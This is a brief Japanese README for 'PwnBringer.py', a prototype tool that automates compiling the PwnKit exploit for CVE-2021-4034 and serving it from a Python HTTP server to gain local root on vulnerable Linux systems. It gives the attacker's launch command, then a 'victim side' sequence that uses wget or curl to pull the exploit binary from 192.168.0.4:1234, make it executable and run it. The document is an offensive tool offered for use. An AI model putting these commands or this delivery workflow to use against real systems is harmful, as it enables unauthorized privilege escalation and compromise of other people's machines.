
CVE-2021-4034 の PwnKit エクスプロイトのコンパイルと配信を自動化し、脆弱な Linux システム上でのローカル権限昇格を可能にします。
PwnKitの自動生成と配信
pwnkit用のソースコードをバイナリにコンパイルし、 自動的にPythonサーバーが起動します。
これはプロトタイプです。 そのため、環境によっては動作しない可能性があります。
chmod +x PwnBringer.py
./PwnBringer.py <lhost> <lport>

[被害者側]
user1@deb:~$ wget http://192.168.0.4:1234/PwnKit
user1@deb:~$ chmod +x PwnKit
user1@deb:~$ ./PwnKit
または
user1@deb:~$ curl http://192.168.0.4:1234/PwnKit -o PwnKit
user1@deb:~$ chmod +x PwnKit
user1@deb:~$ ./PwnKit
